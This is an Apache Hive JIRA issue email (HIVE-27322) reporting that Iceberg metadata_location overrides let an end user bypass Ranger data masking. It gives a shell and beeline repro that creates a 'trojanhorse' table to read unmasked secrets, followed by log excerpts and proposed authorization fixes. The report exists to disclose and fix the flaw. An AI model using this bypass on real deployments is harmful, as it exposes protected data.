[ https://issues.apache.org/jira/browse/HIVE-27322?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17723728#comment-17723728 ]
Janos Kovacs edited comment on HIVE-27322 at 5/17/23 9:04 PM: -------------------------------------------------------------- Found that even with metadata_location set, the authorizer gets wrong location: {noformat} 2023-05-17 19:38:51,867 INFO org.apache.hadoop.hive.ql.Driver: [a49356b4-1b7a-4c9d-9b70-81af12c0465f HiveServer2-Handler-Pool: Thread-253]: Compiling command(queryId=hive_20230517193851_8b9f0ad7-2ae1-4078-b76a-e51c31321b0b): CREATE EXTERNAL TABLE default.policytestth (txt string, secret string) STORED BY ICEBERG TBLPROPERTIES ( 'metadata_location'='hdfs://test.local.host:8020/warehouse/tablespace/external/hive/policytest/metadata/00001-a3e46c1b-318b-4b46-886a-c6ea591f63c1.metadata.json') ... 2023-05-17 19:38:51,898 DEBUG org.apache.iceberg.mr.hive.HiveIcebergStorageHandler: [a49356b4-1b7a-4c9d-9b70-81af12c0465f HiveServer2-Handler-Pool: Thread-253]: Iceberg storage handler authorization URI iceberg://default/policytestth?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Fpolicytestth%2Fmetadata%2Fdummy.metadata.json {noformat} was (Author: kovjanos): Found that even with metadata_location set, the authorizer gets wrong location: {noformat} 2023-05-17 19:38:51,867 INFO org.apache.hadoop.hive.ql.Driver: [a49356b4-1b7a-4c9d-9b70-81af12c0465f HiveServer2-Handler-Pool: Thread-253]: Compiling command(queryId=hive_20230517193851_8b9f0ad7-2ae1-4078-b76a-e51c31321b0b): CREATE EXTERNAL TABLE default.policytestth (txt string, secret string) STORED BY ICEBERG TBLPROPERTIES ( 'metadata_location'='hdfs://test.local.host:8020/warehouse/tablespace/external/hive/policytest/metadata/00001-a3e46c1b-318b-4b46-886a-c6ea591f63c1.metadata.json') ... 2023-05-17 19:38:51,898 DEBUG org.apache.iceberg.mr.hive.HiveIcebergStorageHandler: [a49356b4-1b7a-4c9d-9b70-81af12c0465f HiveServer2-Handler-Pool: Thread-253]: Iceberg storage handler authorization URI iceberg://default/policytestth?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Fpolicytestth%2Fmetadata%2Fdummy.metadata.json {noformat} > Iceberg: metadata location overrides can cause data breach > ---------------------------------------------------------- > > Key: HIVE-27322 > URL: https://issues.apache.org/jira/browse/HIVE-27322 > Project: Hive > Issue Type: Bug > Components: Iceberg integration > Affects Versions: 4.0.0-alpha-2 > Reporter: Janos Kovacs > Priority: Blocker > > Set to bug/blocker instead of enhancement due to its security related nature, > Hive4 should not be released w/o fix for this. Please reset if needed. > > Context: > * There are some core tables with sensitive data that users can only query > with data masking enforced (e.g. via Ranger). Let's assume this is the > `default.icebergsecured` table. > * An end-user can only access the masked form of the sensitive data as > expected... > * The users also have privilege to create new tables in their own sandbox > databases - let's assume this is the `default.trojanhorse` table for now. > * The user can create a malicious table that exposes the sensitive data > non-masked leading to a possible data breach. > * Hive runs with doAs=false to be able to enforce FGAC and prevent end-user > direct file-system access needs > Repro: > * First make sure the data is secured by the masking policy: > {noformat} > <kinit as privileged user> > beeline -e " > DROP TABLE IF EXISTS default.icebergsecured PURGE; > CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string) > STORED BY ICEBERG; > INSERT INTO default.icebergsecured VALUES ('You might be allowed to see > this.','You are NOT allowed to see this!'); > " > <kinit as end user> > beeline -e " > SELECT * FROM default.icebergsecured; > " > +------------------------------------+--------------------------------+ > | icebergsecured.txt | icebergsecured.secret | > +------------------------------------+--------------------------------+ > | You might be allowed to see this. | MASKED BY RANGER FOR SECURITY | > +------------------------------------+--------------------------------+ > {noformat} > * Now let the user to create the malicious table exposing the sensitive data: > {noformat} > <kinit as end user> > SECURED_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal" > beeline -e "DESCRIBE FORMATTED default.icebergsecured;" 2>/dev/null |grep > metadata_location |grep -v previous_metadata_location | awk '{print $5}') > beeline -e " > DROP TABLE IF EXISTS default.trojanhorse; > CREATE EXTERNAL TABLE default.trojanhorse (txt string, secret string) STORED > BY ICEBERG > TBLPROPERTIES ( > 'metadata_location'='${SECURED_META_LOCATION}'); > SELECT * FROM default.trojanhorse; > " > +------------------------------------+-----------------------------------+ > | trojanhorse.txt | trojanhorse.secret | > +------------------------------------+-----------------------------------+ > | You might be allowed to see this. | You are not allowed to see this! | > +------------------------------------+-----------------------------------+ > {noformat} > > Currently - after HIVE-26707 - the rwstorage authorization only has either > the dummy path or the explicit path set for uri: > {noformat} > Permission denied: user [oozie] does not have [RWSTORAGE] privilege on > [iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ftrojanhorse%2Fmetadata%2Fdummy.metadata.json] > Permission denied: user [oozie] does not have [RWSTORAGE] privilege on > [iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ficebergsecured%2Fmetadata%2F00001-f4c2a428-30ce-4afd-82ff-d46ecbf02244.metadata.json] > > {noformat} > This is can be used only to decide whether a user is allowed to create > iceberg tables in certain databases with certain names but controlling it's > metadata location is hard in that form: > * it does not provide a variable of "default table location" so a rule needs > to know the per-database table location or per-catalog warehouse location to > be able to construct it > * it does not provide a rich regex to filter out `/../` style directory > references > * but basically there should be also a flag whether explicit metadata > location is provided or not instead of the dummy reference, which then again > needs explicit matching in the policy to handle > > Proposed enhancement: > * The URL for the iceberg table's rwstorage authorization should be changed > the following way > ** the <database>/<table>?<location> is good but > *** the location should not be url encoded, or at least the authorizer > should check the policy against the decoded url > *** the separator between the table and location should be "/" instead of > "?" as "?" might be mixed with its regex meaning! > *** "/" as separator can be also confusing as the absolute paths would start > with it. Might be that another separator character that does not conflict > with regex, paths and table-name valid characters would be even better. > ** the "snapshot=" seems to be non-relevant in this context, it should not > be part of the <location> > ** There is a need to differentiate the cases where location is only > generated or when location is explicitly provided by end user. For this, the > "default" location might just not be generated as path but replaced with > "default_location" fixed value - note! it has no leading "/". That way a > single policy definition could be used to cover all tables in their default > locations like: > {noformat} > iceberg://mydatabase/*/default_location or > iceberg://mydatabase/*/snapshot=default_location{noformat} > * > ** > *** "default" here means the table's default location which can depend on > the warehouse location, the database location and the table's explicit > location > *** I know many developers don't like these type of hardcoded static values > but with such a value there is no need to modify the rwstorage authorization > (and we already using similar method for "METASTOER" type of storagehandler > authorization) > * The authorization request should include the rwstorage authorization only > if the CERATE/ALTER/DROP is against the Iceberg table and not if in such > statements the iceberg table is only a source - that might be already in fix > via HIVE-27304 > * When any custom Iceberg metadata.json location is provided then the > <location> must contain to provided path to be able to properly authorize it. > * We either should not allow backstep "/../" in any locations or give an > option to filter these out in the final authorization step. > Like with a policy on > {noformat} > iceberg://mydatabase/mytable//data/use-case-1/* or > iceberg://mydatabase/mytable/snapshot=/data/use-case-1/*{noformat} > should not match access for > {noformat} > iceberg://mydatabse/mytable//data/use-case-1/../use-case-2/* or > iceberg://mydatabse/mytable/snapshot=/data/use-case-1/../use-case-2/*{noformat} > * > ** Not allowing "/../" might be easier to handle on hive/impala side > ** But "/../" might be still valid if it used within an allowed locations. > --> users just should use proper location w/o "/../" > > With the above changes one single new default Ranger policy could be used to > globally enable the creation of iceberg tables in any databases in any table > locations but NOT using any custom metadata locations (in case if user > doesn't want to globally turn storagehandler authorization off - via > hive.security.authorization.tables.on.storagehandlers=false - because of > other - hbase, kafka - handlers): > {noformat} > iceberg://*/*/default_location or > iceberg://*/*/snapshot=default_location {noformat} > Note that there is no extra "/" in front of "default_location", only the > separator character in the first case > > Also with the above changes we could allow users to configure authorizations > for custom/shared data location via: > {noformat} > iceberg://mydatabase/*//some/shared/table/location/* or > iceberg://mydatabase/*/snapshot=/some/shared/table/location/* {noformat} > -- This message was sent by Atlassian Jira (v8.20.10#820010)